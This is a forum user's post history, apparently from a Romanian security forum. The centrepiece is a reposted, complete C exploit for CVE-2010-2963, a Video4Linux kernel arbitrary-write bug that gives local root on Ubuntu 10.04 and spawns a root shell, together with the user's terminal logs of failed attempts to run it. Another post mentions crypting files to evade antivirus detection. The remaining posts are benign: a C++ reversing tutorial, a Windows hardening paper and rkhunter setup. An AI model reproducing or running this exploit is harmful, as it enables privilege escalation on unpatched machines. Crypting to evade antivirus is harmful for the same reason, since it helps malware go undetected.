Everything posted by Nytro

  1. It didn't work for me, on 2.6.39. I think I also have an older version; I'll try it on that too. For now:

nytro@rst:~$ whoami
nytro
nytro@rst:~$ uname -a
Linux rst 2.6.39nytro #1 SMP Fri May 20 01:14:36 EEST 2011 i686 GNU/Linux
nytro@rst:~$ cd Documents/
nytro@rst:~/Documents$ gcc exploit.c -o exploit
exploit.c: In function ‘hollywood_status’:
exploit.c:77: warning: left shift count >= width of type
exploit.c: In function ‘kernel_write’:
exploit.c:104: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint64_t’
nytro@rst:~/Documents$ chmod +x exploit
nytro@rst:~/Documents$ ./exploit
Preparing ...
[*] Resolved commit_creds to 0x00000000c016ea90
[*] Resolved prepare_kernel_cred to 0x00000000c016ecc0
[*] Exploit payload function pointer at 0x00000000bfcdbf3c
[*] Opening trigger socket listener on port 31337 ...
[*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede5eb48
Attacking ...
[*] Overwriting at 0xede5eb48 with 0 bytes from 0x4
/dev/video0: No such file or directory
nytro@rst:~/Documents$ whoami
nytro
nytro@rst:~/Documents$ mknod /dev/video0 c 81 0
mknod: `/dev/video0': Permission denied
nytro@rst:~/Documents$ su
Password:
root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0
root@rst:/home/nytro/Documents# exit
exit
nytro@rst:~/Documents$ ./exploit
Preparing ...
[*] Resolved commit_creds to 0x00000000c016ea90
[*] Resolved prepare_kernel_cred to 0x00000000c016ecc0
[*] Exploit payload function pointer at 0x00000000bf87210c
[*] Opening trigger socket listener on port 31337 ...
[*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748
Attacking ...
[*] Overwriting at 0xede58748 with 0 bytes from 0x4
/dev/video0: Permission denied
nytro@rst:~/Documents$ su
Password:
root@rst:/home/nytro/Documents# chmod 666 /dev/video0
root@rst:/home/nytro/Documents# exit
exit
nytro@rst:~/Documents$ ./exploit
Preparing ...
[*] Resolved commit_creds to 0x00000000c016ea90
[*] Resolved prepare_kernel_cred to 0x00000000c016ecc0
[*] Exploit payload function pointer at 0x00000000bfa9b57c
[*] Opening trigger socket listener on port 31337 ...
[*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748
Attacking ...
[*] Overwriting at 0xede58748 with 0 bytes from 0x4
/dev/video0: No such device or address
nytro@rst:~/Documents$ ls /dev/video*
/dev/video0
nytro@rst:~/Documents$ lsmod
nytro@rst:~/Documents$

On another version (2.6.35):

nytro@rst:~$ whoami
nytro
nytro@rst:~$ lsmod
nytro@rst:~$ cd Documents/
nytro@rst:~/Documents$ ls /dev/video*
ls: cannot access /dev/video*: No such file or directory
nytro@rst:~/Documents$ ./exploit
Preparing ...
[*] Resolved commit_creds to 0x00000000c016cd40
[*] Resolved prepare_kernel_cred to 0x00000000c016d190
[*] Exploit payload function pointer at 0x00000000bf8dc72c
[*] Opening trigger socket listener on port 31337 ...
[*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048
Attacking ...
[*] Overwriting at 0xf415a048 with 0 bytes from 0x4
/dev/video0: No such file or directory
nytro@rst:~/Documents$ su
Password:
root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0
root@rst:/home/nytro/Documents# chmod 666 /dev/video0
root@rst:/home/nytro/Documents# exit
exit
nytro@rst:~/Documents$ ./exploit
Preparing ...
[*] Resolved commit_creds to 0x00000000c016cd40
[*] Resolved prepare_kernel_cred to 0x00000000c016d190
[*] Exploit payload function pointer at 0x00000000bfbcabbc
[*] Opening trigger socket listener on port 31337 ...
[*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048
Attacking ...
[*] Overwriting at 0xf415a048 with 0 bytes from 0x4
/dev/video0: No such device or address
nytro@rst:~/Documents$ uname -a
Linux rst 2.6.35-28-generic #50-Ubuntu SMP Fri Mar 18 19:00:26 UTC 2011 i686 GNU/Linux
nytro@rst:~/Documents$

PS: My kernels were probably not compiled with video4linux support. Is there nobody with Ubuntu 10.04 who can try this?
  2. Ubuntu 10.04 (kernel 2.6.36?) - Local Root Privilege Escalation Exploit

I'm not sure it works. I was looking today at a presentation from Defcon 19 and came across it. It's about this issue:

CVE - CVE-2010-2963 (under review)
drivers/media/video/v4l2-compat-ioctl32.c in the Video4Linux (V4L) implementation in the Linux kernel before 2.6.36 on 64-bit platforms does not validate the destination of a memory copy operation, which allows local users to write to arbitrary kernel memory locations, and consequently gain privileges, via a VIDIOCSTUNER ioctl call on a /dev/video device, followed by a VIDIOCSMICROCODE ioctl call on this device.

Info: National Vulnerability Database (NVD), CVE-2010-2963

Exploit:

/*
 * Stand-alone CVE-2010-2963 exploit, tuned for unpatched Ubuntu 10.04
 * Kees Cook <kees@ubuntu.com>
 *
 * Thanks to Dan Rosenberg for net target/trigger (with thanks to
 * netstat authors for INET_DIAG parsing code).
 * Thanks to Brad Spengler for symbols parser and creds payload.
 * Greets to pipacs, redpig, nelhage, segoon, taviso, solardiz.
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <time.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/inet_diag.h>
#include <sys/utsname.h>
#include <string.h>
#include <sys/mman.h>
#include <errno.h>
#include <netinet/in.h>
#include <linux/videodev.h>
#include <syscall.h>
/* 32bit __NR_ioctl syscall 54 */
#include <asm/unistd_32.h>
#define IOCTL_SYSCALL __NR_ioctl

#define PORT 31337        /* Trigger socket, just listens briefly */
#define SOCK_OFFSET 584   /* offsetof(struct sock, sk_destruct) */
#define DEVICE "/dev/video0"

/* Issue a 32-bit (int 0x80) syscall so the kernel takes the compat ioctl path */
unsigned int syscall32(unsigned int syscall, unsigned int arg1, unsigned int arg2, unsigned int arg3)
{
    unsigned int rc;
    asm volatile(
        "movl %1, %%ebx;\n"
        "movl %2, %%ecx;\n"
        "movl %3, %%edx;\n"
        "movl %4, %%eax;\n"
        "int $0x80;\n"
        "movl %%eax, %0;\n"
        /* output */
        : "=g"(rc)
        /* input */
        : "g"(arg1), "g"(arg2), "g"(arg3), "g"(syscall)
        /* clobbered registers */
        : "%eax", "%ebx", "%ecx", "%edx"
    );
    return rc;
}

int hollywood = 0;
void hollywood_status(char *format, unsigned long value)
{
    unsigned long mask = 0x0;
    unsigned long drama;
    int counter;

    if (!hollywood) {
        printf(format, value);
        printf("\n");
        return;
    }
    for (counter = 0 ; ; counter ++) {
        drama = ((unsigned long)rand() << (sizeof(int)*8)) | (unsigned long)rand();
        printf("\r");
        printf(format, (drama & ~mask) | (value & mask));
        fflush(NULL);
        usleep(10000);
        if (mask == ~0x0UL) break;
        if (counter % 16 == 0) {
            mask |= (0xFFUL << ((rand() % sizeof(mask))*8));
        }
    }
    printf("\n");
}

struct video_code32 {
    char loadwhat[16];
    int datasize;
    int padding;
    uint64_t data;
};

int kernel_write(uint64_t destination, void *source, int length)
{
    static struct video_code32 *vc;
    static struct video_tuner *tuner;
    int dev;
    unsigned int code;

    /* cast to unsigned long long so the format matches on both 32- and 64-bit builds */
    printf("[*] Overwriting at 0x%llx with %d bytes from %p\n",
           (unsigned long long)destination, length, source);
    if ( (dev=open(DEVICE, O_RDWR)) < 0) {
        perror(DEVICE);
        exit(1);
    }
    printf(" - Opened %s\n", DEVICE);
    if (hollywood) sleep(3);

    if (!vc) {
        vc = (struct video_code32*)mmap(NULL, sizeof(*vc), PROT_READ | PROT_WRITE,
                                        MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0);
        if (vc == MAP_FAILED) {
            perror("mmap");
            exit(1);
        }
    }
    if (!tuner) {
        tuner = (struct video_tuner*)mmap(NULL, sizeof(*tuner), PROT_READ | PROT_WRITE,
                                          MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0);
        if (tuner == MAP_FAILED) {
            perror("mmap");
            exit(1);
        }
    }

    vc->datasize = length;
    vc->data = (uint64_t)(uintptr_t)source;

    memset(tuner, 0xBB, sizeof(*tuner));
    // manual union, since a real union won't do ptrs for 64bit
    uint64_t *ptr = (uint64_t*)(&(tuner->name[20]));
    *ptr = destination;

    printf(" - Spamming VIDIOCSTUNER ioctl ...\n");
    // beat memory into the stack...
    code = 0x40347605; // VIDIOCSTUNER
    syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
    syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
    syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
    syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
    syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
    syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);

    /* VIDIOCSMICROCODE32, the misconstructed VIDIOCSMICROCODE */
    code = 0x4020761b;
    syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)vc);
    printf(" - VIDIOCSMICROCODE ioctl completed\n");
    return 0;
}

/* Get the address of the sock struct for our socket */
unsigned long get_sock_addr(unsigned int port)
{
    FILE *f;
    char buf[1024];
    unsigned int testport, a;
    unsigned long addr, b;

    f = fopen("/proc/net/tcp", "r");
    if (f == NULL) {   /* fopen() returns NULL on failure, not a negative value */
        printf("[*] Failed to open /proc/net/tcp\n");
        return 0;
    }
    while (fgets(buf, 1024, f)) {
        sscanf(buf, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X "
                    "%02X:%08lX %08X %5d %8d %lu %d %p %lu %lu %u %u "
                    "%d\n",
               &a, &a, &testport, &a, &a, &a, &a, &a, &a, &b, &a, &a, &a, &b, &a,
               (void **)&addr, &b, &b, &a, &a, &a);
        if (testport == port)
            goto out;
    }
    addr = 0;
out:
    fclose(f);
    return addr;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while(ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            char *msg;
            asprintf(&msg, "[*] Resolved %s to 0x%%016lx", name);
            hollywood_status(msg, addr);
            free(msg);
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    if (rep)
        return 0;
fallback:
    /* didn't find the symbol, let's retry with the System.map
       dedicated to the pointlessness of Russell Coker's SELinux
       test machine (why does he keep upgrading the kernel if
       "all necessary security can be provided by SE Linux"?)
     */
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

int sock;
unsigned long choose_target()
{
    unsigned long target;
    struct sockaddr_in addr;

    printf("[*] Opening trigger socket listener on port %d ...\n", PORT);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        printf("[*] Failed to open trigger socket.\n");
        exit(1);
    }
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = INADDR_ANY;
    if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
        printf("[*] Failed to bind trigger socket.\n");
        exit(1);
    }
    /* Our socket won't appear in /proc/net/tcp unless it's listening */
    if (listen(sock, 1)) {
        printf("[*] Failed to listen on trigger socket.\n");
        exit(1);
    }
    target = get_sock_addr(PORT);
    if (!target) {
        printf("[*] Failed to get trigger socket address via INET_DIAG.\n");
        exit(1);
    }
    target += SOCK_OFFSET;
    hollywood_status("[*] Trigger struct sock address + offset of sk_destruct: 0x%016lx", target);
    return target;
}

void trigger_target()
{
    if (hollywood) sleep(2);
    printf("[*] Triggering payload...\n");
    if (hollywood) sleep(3);
    close(sock);
}

unsigned long get_payload_addr(void)
{
    commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
    return (uintptr_t)getroot;
}

int main(int argc, char * argv[])
{
    unsigned long payload;
    unsigned long target;

    srand(time(NULL)); // Hollywood level randomness!
    if (argc>1 && !strcmp(argv[1],"--hollywood")) hollywood = 1;

    printf("Preparing ...\n");
    payload = get_payload_addr();
    hollywood_status("[*] Exploit payload function pointer at 0x%016lx", (uintptr_t)&payload);
    target = choose_target();

    printf("Attacking ...\n");
    kernel_write(target, (void*)&payload, sizeof(payload));
    trigger_target();

    if (getuid()) {
        printf("[*] Failed to get root.\n");
        return -1;
    }
    if (hollywood) {
        printf("[*] *dramatic chord*\n");
        sleep(2);
    }
    printf("[*] Pwnage complete!\n");
    execl("/bin/sh", "sh", NULL);
    perror("execl");
    return 1;
}

I don't have many details for now; if I have time to look into it, I'll come back with more information.
  3. You can do whatever you want with it, you can modify whatever you like, there won't be any problem.
  4. Yes, it's a sort of improved version of it, but I think I rebuilt it from scratch. Here's Selenity CMS, it's sort of the latest version. You can also find it here at RST Power. http://www65.zippyshare.com/v/1073349/file.html Screenshot AdminCP: http://i56.tinypic.com/2ccs4s8.jpg
  5. I don't mind being filmed if I manage and it turns out well.
  6. We have to do something, whatever we can, anything.
  7. It's at least 3 years old, looks ugly and has almost no options. So there's no point... I don't even know if I still have it.
  8. I don't know what you scanned... http://www.virustotal.com/file-scan/report.html?id=5228eae4b11ceed3fad19e591b5c800433783503e615560f0739d4f91e4a2d9b-1315512955 And that is with a simple, harmless file crypted, because the stub is detectable.
  9. Reversing C++ programs with IDA pro and Hex-rays

Introduction

During my holidays, I had plenty of time to study and reverse a program which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and I found it quite hard. Here's a sample of what you get with Hex-rays when you start digging into an interesting function:

v81 = 9;
v63 = *(_DWORD *)(v62 + 88);
if ( v63 )
{
  v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(v63 + 24);
  if ( v64 )
    v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD *)(v3 + 40), bstrString);
}

It's our job to add symbol names, identify classes and set up all the information to help Hex-rays give us a reliable and certainly understandable output:

padding = *Dst;
if ( padding < 4 )
  return -1;
buffer_skip_bytes(this2->decrypted_input_buffer, 5u);
buffer_skip_end(this2->decrypted_input_buffer, padding);
if ( this2->encrypt_in != null )
{
  if ( this2->compression_in != null )
  {
    buffer_reinit(this2->compression_buffer_in);
    packet_decompress(this2, this2->decrypted_input_buffer, this2->compression_buffer_in);
    buffer_reinit(this2->decrypted_input_buffer);
    avail_len = buffer_avail_bytes(this2->compression_buffer_in);
    ptr = buffer_get_data_ptr(this2->compression_buffer_in);
    buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len);
  }
}
packet_type = buffer_get_u8(this2->decrypted_input_buffer);
*len = buffer_avail_bytes(this2->decrypted_input_buffer);
this2->packet_len = 0;
return packet_type;

Of course, Hex-rays is not going to invent the names for you; you'll still have to make sense of the code and what it means to you, but at least being able to give a name to the classes will certainly help. All my samples here have been compiled either with Visual Studio or GNU C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest.

Structure of a C++ program

It is not my goal to teach you how OOP works, you already know that. We'll just see how it works (and is implemented) in broad lines.

Class = data structure + code (methods). The data structure can only be seen in the source code, while the methods will appear in your favorite disassembler.

Object = memory allocation + data + virtual functions. The object is an instantiation of a class, and something you can observe in IDA. An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions.

Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it). Member variables are a bit easier: they work like their counterpart in C (structs), IDA has a very handy tool to declare structures, and Hex-rays handles them very well in the disassembly.

Let's go back to the bits and bytes.

Object creation

int __cdecl sub_80486E4()
{
  void *v0; // ebx@1

  v0 = (void *)operator new(8);
  sub_8048846(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Here's the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn't mean we have 8 bytes of variables. The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor.

The next function call is a little cryptic. It's doing two pointer dereferences on v0 before calling it. It's a virtual function call. All polymorphic objects have a special pointer in their variables, called the vtable. This table contains the addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This may not stay true for multiple inheritance. I did not test.)

Let's do some IDA magic:

Rename the symbols

Just click on a name, press « n » and give a meaningful name. Since we don't know yet what our class does, I suggest we name the class « class1 », and use this convention until we've understood what our class does. It's very possible that we're going to discover other classes before we've finished digging into class1, so I suggest we simply continue naming classes as we find them.

int __cdecl main()
{
  void *v0; // ebx@1

  v0 = (void *)operator new(8);
  class1::ctor(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Create structures

The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures.

Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that's what we've got here!

Now, we're going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result.

Create a new structure of 12 bytes, and call it « class1_vtable ». At this stage, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1's declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic.

We can rename the few methods « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here's a counterexample. It is time to analyze the constructor.

Analysis of the constructor

int __cdecl class1::ctor(void *a1)
{
  sub_80487B8(a1);
  *(_DWORD *)a1 = &off_8048A38;
  return puts("B:()");
}

You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class. « sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent class. « off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big our vtable is (just watch for the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes.

It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn't provide anything you can't see in the classic view.

The strange call in the constructor

int __cdecl sub_80487B8(int a1)
{
  int result; // eax@1

  *(_DWORD *)a1 = &off_8048A50;
  puts("A::A()");
  result = a1;
  *(_DWORD *)(a1 + 4) = 42;
  return result;
}

The call to the « sub_80487b8() » function in the constructor reveals the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we're in yet another constructor. Don't retype argument « a1 » as « class1 », since we're not dealing with class1. We found a new class, which we will call « class2 ». This class is a superclass of class1.

Let's do the same work as in class1. The only difference is that we do not know exactly the size of its members. There are two ways of figuring it out:
  • Look at the xrefs of class2::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members.
  • Look at the methods in the vtable, and try to guess what's the highest member ever accessed.

In our case, « class2::ctor » accesses the 4 bytes after the first 4 and sets them to 42. Since its child class « class1 » is 8 bytes long, so is « class2 ». Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children.

Study of the destructors

Let's go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let's study it.

if ( v0 )
  ((void (__cdecl *)(class1 *))v0->vtable->method_3)(v0);
…
void __cdecl class1::m3(class1 *a1)
{
  class1::m2(a1);
  operator delete(a1);
}
…
void __cdecl class1::m2(class1 *a1)
{
  a1->vtable = (class1_vtable *)&class1__vtable;
  puts("B::~B()");
  class2::m2((class2 *)a1);
}
…
void __cdecl class2::m2(class2 *a1)
{
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::~A()");
}

What we can see here is the following: class1::m3 is a destructor, which calls class1::m2, which is the main destructor of class1. What this destructor does is ensure that we're well in the « class1 » context, by setting the vtable back to its « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to the « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes along the way.

Hey, what are all these casts? Why do I have two structures defining the same fields?

What we have here is exactly the same problem that you get when doing OOP in C: you end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields: for each class, define a classXX_members, classXX_vtable and classXX structure.

classXX contains
  +++ vtable (typed to classXX_vtable *)
  +++ classXX-1_members (members of the superclass)
  +++ classXX_members, if any
classXX_vtable contains
  +++ classXX-1_vtable
  +++ classXX's vptrs, if any

Ideally, you should start from the main class and go to the children, until you end up in an edge class. In our example, here's the « solution » of our sample:

00000000 class1          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 class2_members  class2_members ?
00000008 class1          ends
00000008
00000000 ; ----------------------------------------------
00000000
00000000 class1_members  struc ; (sizeof=0x0)
00000000 class1_members  ends
00000000
00000000 ; ----------------------------------------------
00000000
00000000 class1_vtable   struc ; (sizeof=0xC)
00000000 class2_vtable   class2_vtable ?
0000000C class1_vtable   ends
0000000C
00000000 ; ----------------------------------------------
00000000
00000000 class2          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 members         class2_members ?
00000008 class2          ends
00000008
00000000 ; ----------------------------------------------
00000000
00000000 class2_vtable   struc ; (sizeof=0xC)
00000000 method_1        dd ?                    ; offset
00000004 dtor            dd ?                    ; offset
00000008 delete          dd ?                    ; offset
0000000C class2_vtable   ends
0000000C
00000000 ; ----------------------------------------------
00000000
00000000 class2_members  struc ; (sizeof=0x4)
00000000 field_0         dd ?
00000004 class2_members  ends

int __cdecl main()
{
  class1 *v0; // ebx@1

  v0 = (class1 *)operator new(8);
  class1::ctor(v0);
  ((void (__cdecl *)(class1 *))v0->vtable->class2_vtable.method_1)(v0);
  if ( v0 )
    ((void (__cdecl *)(class1 *))v0->vtable->class2_vtable.delete)(v0);
  return 0;
}

int __cdecl class1::ctor(class1 *a1)
{
  class2::ctor((class2 *)a1);
  a1->vtable = (class1_vtable *)&class1__vtable;
  return puts("B:()");
}

class2 *__cdecl class2::ctor(class2 *a1)
{
  class2 *result; // eax@1

  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::A()");
  result = a1;
  a1->members.field_0 = 42;
  return result;
}

In brief
  • When you find a new class, give it a symbolic name, and resolve the whole tree before figuring out what its real name should be.
  • Start from the ancestor and go up to the children.
  • Look at the constructors and destructors first; check out the references to new() and static methods.
  • Often, the methods of a same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other.
  • Sometimes, the constructors are inlined in child classes' constructors, or even at the place of the instantiation.
  • If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variables only once.
  • Use and abuse Hex-rays' typing system, it's very powerful.
  • Pure virtual classes are hell: you can find several classes having similar vtables, but no code in common. Beware of them.

Sources

Try this at home!
  • The binary (elf32 stripped)
  • The source file. Don't open it too fast!

Source: Reversing C++ programs with IDA pro and Hex-rays at Aris' Blog - Computers, ssh and rock'n roll
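As an added worked example (not code from Aris' article), here is the sample hierarchy rebuilt in C++ with the vptr and the member read back from the object's raw bytes, so you can check the layout the article describes: vptr first, members after it, and the vptr reset to the parent's vtable as the destructor chain unwinds. It assumes the Itanium C++ ABI layout (GCC/Clang, which is what the article observed); the names A, B and field_0 mirror the article's sample and are chosen here.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>

// Read the first pointer-sized word of an object's storage: on the Itanium ABI
// (assumed here) that word is the vptr, exactly what the article's "vtable" field is.
static uintptr_t read_vptr(const void *obj) {
    uintptr_t v;
    std::memcpy(&v, obj, sizeof v);
    return v;
}

// Read the 4-byte member right after the vptr (the article's class2_members.field_0).
static int read_field_0(const void *obj) {
    int v;
    std::memcpy(&v, static_cast<const char *>(obj) + sizeof(void *), sizeof v);
    return v;
}

// What each destructor body saw as the vptr while it was running.
static uintptr_t g_vptr_in_B_dtor = 0;
static uintptr_t g_vptr_in_A_dtor = 0;

struct A {                      // the article's class2 (the superclass)
    int field_0;
    A() : field_0(42) { std::puts("A::A()"); }
    virtual void method_1() { std::puts("A::method_1()"); }
    virtual ~A() {
        g_vptr_in_A_dtor = read_vptr(this);   // compiler already reset vptr to A's vtable
        std::puts("A::~A()");
    }
};

struct B : A {                  // the article's class1 (the child)
    B() { std::puts("B::B()"); }
    void method_1() override { std::puts("B::method_1()"); }
    ~B() override {
        g_vptr_in_B_dtor = read_vptr(this);   // still B's vtable at this point
        std::puts("B::~B()");
    }
};

struct VptrTrace {
    uintptr_t live_A;      // vptr of a fully constructed A
    uintptr_t live_B;      // vptr of a fully constructed B
    uintptr_t in_B_dtor;   // vptr observed inside B::~B
    uintptr_t in_A_dtor;   // vptr observed inside A::~A, called from B::~B
    int field_0_of_B;      // member read at offset sizeof(void*) of the B object
    std::size_t size_B;    // sizeof(B): vptr + int (+ padding on 64-bit)
};

// Reproduce the article's main(): operator new + ctor, one virtual call, then the
// deleting destructor, and record how the vptr moves through the ctor/dtor chain.
VptrTrace trace_hierarchy() {
    VptrTrace t{};
    A *a = new A;
    t.live_A = read_vptr(a);
    delete a;

    B *b = new B;                       // operator new(8) + class1::ctor in the article
    t.live_B = read_vptr(b);
    t.field_0_of_B = read_field_0(b);   // class2::ctor wrote 42 here
    b->method_1();                      // first vtable slot (class2_vtable.method_1)
    delete b;                           // deleting dtor: B::~B -> A::~A -> operator delete
    t.in_B_dtor = g_vptr_in_B_dtor;
    t.in_A_dtor = g_vptr_in_A_dtor;
    t.size_B = sizeof(B);
    return t;
}

int main() {
    VptrTrace t = trace_hierarchy();
    std::printf("vtable A = %#llx, vtable B = %#llx\n",
                (unsigned long long)t.live_A, (unsigned long long)t.live_B);
    std::printf("vptr in B::~B = %#llx, vptr in A::~A = %#llx\n",
                (unsigned long long)t.in_B_dtor, (unsigned long long)t.in_A_dtor);
    std::printf("field_0 = %d, sizeof(B) = %zu\n", t.field_0_of_B, t.size_B);
    return 0;
}
```

The vptr seen inside A::~A equals the vptr of a plain A object, which is the "set the vtable back to the parent context" step the article reads out of class2::m2.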
  10. Hardening Windows Applications
olleB - olle @ toolcrypt.org

About this document
This paper is aimed at Windows developers in the hope of explaining how Windows' security features can be used to better secure their applications. It is not a complete guide to the Windows security model and may skip details that were deemed unimportant at the time of writing. Please bear that in mind while reading. Thank you.

Introduction to Windows security
In this introductory chapter some basic concepts of the Windows security model are explained in just enough detail to understand the material presented in the following chapters. If you are already familiar with how the Windows model of access control works, feel free to skip ahead and use this chapter for reference only. Another great reference is the MSDN section on Access Control available at Access Control (Windows).

Download: https://media.blackhat.com/bh-us-10/whitepapers/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-wp.pdf
  11. Install RKHunter
Product Name: RKHunter
Product Version: 1.3.6
Homepage: Rootkit.nl - Protect your machine
Description: rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors and possible local exploits. It does this by comparing MD5 hashes of important files with known good ones in an online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

Step 1: Downloading, installing and updating
cd /usr/local/src
wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz
wget http://dfn.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.6.tar.gz.sha1.txt
sha1sum -c rkhunter-1.3.6.tar.gz.sha1.txt
tar -zxvf rkhunter-1.3.6.tar.gz
cd rkhunter-1.3.6
./installer.sh --layout default --install
/usr/local/bin/rkhunter --update
/usr/local/bin/rkhunter --propupd
rm -Rf /usr/local/src/rkhunter*
cd

Step 2: Adding a daily cron job
Step 2.1: Create the run file
nano -w /etc/cron.daily/rkhunter.sh
Step 2.2: Add this text to rkhunter.sh
#!/bin/sh
(
/usr/local/bin/rkhunter --versioncheck
/usr/local/bin/rkhunter --update
/usr/local/bin/rkhunter --cronjob --report-warnings-only
) | /bin/mail -s 'rkhunter Daily Run (PutYourServerNameHere)' your@email.here
REMEMBER TO CHANGE (PutYourServerNameHere) AND your@email.here
